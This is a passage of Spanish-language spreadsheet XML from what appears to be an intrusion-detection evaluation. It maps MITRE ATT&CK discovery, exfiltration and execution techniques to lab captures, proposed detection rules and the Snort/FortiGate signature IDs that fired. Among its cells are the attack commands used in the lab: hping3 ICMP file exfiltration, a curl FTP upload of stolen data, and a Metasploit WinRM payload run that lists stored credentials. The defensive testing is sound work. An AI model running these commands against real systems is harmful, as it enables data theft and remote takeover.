      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2000538</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2100453, 2100451, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2001689</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010938</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101420, 2101418, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100257</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100598</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598, 36650, 13586, 50447</t>
    </r>
  </si>
  <si>
    <t>Se realiza un escaneo completo de puertos. Snort detecta el escaneo de puertos mediante los SID 2009358 detectando el uso de nmap. Además, detecta el escaneo de diferentes rangos de puertos como el SID 2002910. FortiGate sólo detecta el descubrimiento de puertos relacionados con el servicio HTTP</t>
  </si>
  <si>
    <t>DDos + Escaneo de puertos</t>
  </si>
  <si>
    <t>T1046-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>En determinadas circunstancias, si el envío de paquetes constituye una amenaza de denegación de servicio, podría detectarse el envío masivo de paquetes</t>
  </si>
  <si>
    <t>Manual [4] / B.31</t>
  </si>
  <si>
    <t>2035480, 2025644</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002749, 2002752, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2035480, 2000419, 2025644</t>
    </r>
  </si>
  <si>
    <t>2035480, 2000419, 2025644</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Descubrimiento de servicios y puertos</t>
  </si>
  <si>
    <t>T1018-service_discovery_[3].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío de mútliples peticiones a un rango de puertos en un tiempo determinado</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.1</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.1.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.1.5</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 2002911</t>
  </si>
  <si>
    <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911</t>
  </si>
  <si>
    <t xml:space="preserve"> 2010936, 2010939, 200911</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937, 2010935, 2010936, 2010939, 2002910, 200911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749, 2101418, 2100615</t>
    </r>
  </si>
  <si>
    <t>2002752, 2100615, 2010935, 2010937, 2002749, 2002910</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936, 2010939, 200911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2101418</t>
    </r>
  </si>
  <si>
    <t>En este ataque se realiza el escaneo de 1000 puertos. Sin embargo, no se detecta el uso de nmap y solo se detectan los rangos de puertos 5900-5920 y 5800-5820 (SIDS 2002911 2002910) y los puertos 3306,1433,1521,5432. FortiGate sólo detecta este ataque para 6 puertos concretos</t>
  </si>
  <si>
    <t>Group Policy Discovery</t>
  </si>
  <si>
    <t>T1615</t>
  </si>
  <si>
    <t>Comandos mediante Powershell para obtener información sobre configuraciones de políticas de grupo</t>
  </si>
  <si>
    <t>T1615-Group_Policy_Discovery_[5].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías</t>
  </si>
  <si>
    <t>Ejecución de comandos mediante Powershell para comprobar políticas de grupo</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.6.1</t>
  </si>
  <si>
    <t>Misma consulta realizada muchas veces repetida</t>
  </si>
  <si>
    <t>System Owner</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>Descubrimiento de sesión de usuario en equipo remoto</t>
  </si>
  <si>
    <t>quser, qwinsta</t>
  </si>
  <si>
    <t>T1033-System_owner_[4].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte múltiples interacciones con la API LSM_API_service del servicio RPC desde el mismo equipo origen.</t>
  </si>
  <si>
    <t>Manual [4] /  3.12</t>
  </si>
  <si>
    <t>Manual [4] / B.12</t>
  </si>
  <si>
    <t>Manual [4] / 4.12</t>
  </si>
  <si>
    <t>44489, 2002752, 2002749, 2044666, 2051116</t>
  </si>
  <si>
    <t>44489, 2044666, 2051116</t>
  </si>
  <si>
    <t>Domain Trust Discovery</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>Descubrimiento de dominios de confianza en entorno Active Directory</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>T1482-Domain_trust_discovery_[4].pcapng</t>
  </si>
  <si>
    <t>Regla personalizada que detecte paquetes LDAP, procedentes de equipos que no son DC en la red (configurable manualmente) y con la cadena objectClass=trustedDomain</t>
  </si>
  <si>
    <t>Manual [4] /  3.13</t>
  </si>
  <si>
    <t>Manual [4] / B.13</t>
  </si>
  <si>
    <t>Manual [4] / 4.13</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>TA0010</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltración por ICMP</t>
  </si>
  <si>
    <t xml:space="preserve">T1048.003-Exfiltration_over_ICMP_[2].pcapng </t>
  </si>
  <si>
    <t>Regla genérica que detecte PING inusual.</t>
  </si>
  <si>
    <t>Exfiltracion mediante protocolo ICMP. Envia varios echo Request que contienen como datos el contenido de ese fichero. Comando: echo "Esto es un exfiltración sobre ICMP" &gt; file;timeout 15s hping3 --file ./file --data 36 192.168.2.2 --icmp</t>
  </si>
  <si>
    <t>Manual [2] /  3.2.2.1</t>
  </si>
  <si>
    <t>Manual [4] / B.27</t>
  </si>
  <si>
    <t>Manual [2] /  4.2.2.2</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">31767, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">31767, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100384, 2002752, 2002749, 2100408, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 384, 408, 31767</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>29456</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 384, 408, 31767</t>
    </r>
  </si>
  <si>
    <t>El mismo mensaje ICMP es enviado varias veces repetido. Snort detecta el envio inusual de PING (SID 29456)</t>
  </si>
  <si>
    <t>Exfiltración por FTP</t>
  </si>
  <si>
    <t>Caldera</t>
  </si>
  <si>
    <t>T1048.003-Exfiltration_over_FTP_[3].pcapng</t>
  </si>
  <si>
    <t>Exfiltracion de datos utilizando el protocolo FTP. Utilizando caldera y la operacion Advanced Thief. Comando: curl -T stage_to_steal.tar.gz.gpg ftp://172.16.1.2/VictimDirectory/ --user "dit:dit"</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.15</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.15.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.15.5</t>
  </si>
  <si>
    <t>2043217, 504</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749, 2100472, 2006409, 2043217,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2003303, 2003410,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2015016, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006409, 2043217</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2003303, 2003410,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2015016, 50447</t>
    </r>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>T1011</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t xml:space="preserve"> T1011.001</t>
  </si>
  <si>
    <t>Extracción via Bluetooth</t>
  </si>
  <si>
    <t>Covenant, btobex, Bluetooth</t>
  </si>
  <si>
    <t>T1011-Exfiltration_over_bluetooth_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en red Bluetooth. Envío y/o recepción de información comprometida por la red Bluetooth</t>
  </si>
  <si>
    <t>Manual [4] /  3.23</t>
  </si>
  <si>
    <t>Manual [4] / B.23</t>
  </si>
  <si>
    <t>Manual [4] / 4.23</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Ejecución de script en Python para activar el reenvío de paquetes en el equipo víctima</t>
  </si>
  <si>
    <t>SSH, Scapy</t>
  </si>
  <si>
    <t>T1020.001-Automated_exfiltration_traffic_duplication_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías en red que detecte el envío duplicado de paquetes procedentes de un mismo origen interno a la organización</t>
  </si>
  <si>
    <t>Manual [4] /  3.24</t>
  </si>
  <si>
    <t>Manual [4] / B.24</t>
  </si>
  <si>
    <t>Manual [4] / 4.24</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Comunicación C2 para el establecimiento de extracción programada</t>
  </si>
  <si>
    <t>Covenant, Powershell</t>
  </si>
  <si>
    <t>T1029-Scheduled_transfer_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, basada en el descubrimiento de eventos programados que no han sido creados por el usuario.</t>
  </si>
  <si>
    <t>Manual [4] /  3.25</t>
  </si>
  <si>
    <t>Manual [4] / B.25</t>
  </si>
  <si>
    <t>Manual [4] / 4.25</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749, 2101917</t>
    </r>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Dividir archivos para realizar transferencias menores a un umbral que provoque alertas</t>
  </si>
  <si>
    <t>ftp, split</t>
  </si>
  <si>
    <t>T1030-Transfer_Size_Limits_[5].pcapng</t>
  </si>
  <si>
    <t>Dependiendo la forma en la que se envien los archivos, puede ser indetectable. Sin embargo, si utiliza protocolos de transferencia de ficheros (FTP,SMB...) resulta importante monitorizar transferencias con un mismo tamaño de manera concurrente</t>
  </si>
  <si>
    <t>Transferencia de ficheros mediante FTP, previamente divididos en paquetes de un tamaño constante</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.9.1</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transferir archivos de una cuenta a otra mediante un servicio en la nube</t>
  </si>
  <si>
    <t>OneDrive</t>
  </si>
  <si>
    <t>T1537-Transfer_Data_to_Cloud_Account_[5].pcapng</t>
  </si>
  <si>
    <t>Deteccion por listas negras/anomalías</t>
  </si>
  <si>
    <t>Transferir entre dos cuentas en la nube unos ficheros</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.9.2</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltración por canal C2</t>
  </si>
  <si>
    <t>T1041-exfiltration_over_c2_channel_[3].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías basada en la sospecha de una extracción de información confidencial por un posible canal C2</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.14</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.14.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.14.5</t>
  </si>
  <si>
    <t>2043217, 2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>50447, 2043217, 2034567, 2013028, 2016992</t>
  </si>
  <si>
    <t>2002752, 2002749, 2006409, 2043217, 2034567, 2013028, 2016992, 2002824, 50447</t>
  </si>
  <si>
    <t>2006409, 2043217, 2034567, 2013028, 2016992, 2002824, 50447</t>
  </si>
  <si>
    <t>Exfiltration over Web Service</t>
  </si>
  <si>
    <t>T1567</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltrar datos de un equipo a la nube</t>
  </si>
  <si>
    <t>Google Drive</t>
  </si>
  <si>
    <t>T1567.002-Exfiltration_To_Cloud_Storage_[5].pcapng</t>
  </si>
  <si>
    <t>Transferir ficheros de un equipo a la nube</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.9.3</t>
  </si>
  <si>
    <t>Execution</t>
  </si>
  <si>
    <t>TA0002</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>Enlace malicioso</t>
  </si>
  <si>
    <t>wget</t>
  </si>
  <si>
    <t>T1204.001-malicious_link_[3].pcapng</t>
  </si>
  <si>
    <t>Redireccion al pinchar en un enlace a un sitio malicioso. Comando : wget http://172.16.1.2 (Desde la víctima)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.17</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.17.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.17.5</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Ejecución de carga por WinRM</t>
  </si>
  <si>
    <t>T1047-WinRM_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte intento de ejecucion de código shell en un equipo</t>
  </si>
  <si>
    <t>Ejecucion de payload en un equipo mediante WinRM. Comando: msfconsole -x "use exploit/windows/winrm/winrm_script_exec; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; set LPORT 5555; set username administrator; set password vagrant; set force_vbs true; run -z; sessions -c 'cmdkey /list'; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.4.1</t>
  </si>
  <si>
    <t>Manual [4] / B.26</t>
  </si>
  <si>
    <t>Manual [2] /  4.2.1.5</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1394</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 20619</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1394</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 20619</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1394,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 20619</t>
    </r>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Ataque con Botnet</t>
  </si>
  <si>
    <t>T1203-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Manual [4] / B.35</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Ejecución de un Servicio / Fichero Ejecutable de manera remota</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>T1569-System_services_service_execution_[4].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Existen múltiples métodos de detección. Como ejemplos:
        Regla que detecte la cadena “PSEXESVC” en el contenido de mensajes SMBv2
        Regla que detecte archivos ejecutables en mensajes SMB
</t>
  </si>
  <si>
    <t>Manual [4] /  3.6</t>
  </si>
  <si>
    <t>Manual [4] / B.6</t>
  </si>
  <si>
    <t>Manual [4] / 4.6</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">. 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>30281</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 26385, 2101620, 2100459, 2044666, 2051116, 2024510, 2002752, 2002749, 2027191</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">459, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010781</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2025701, 2025699, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027237</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">. 44489, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
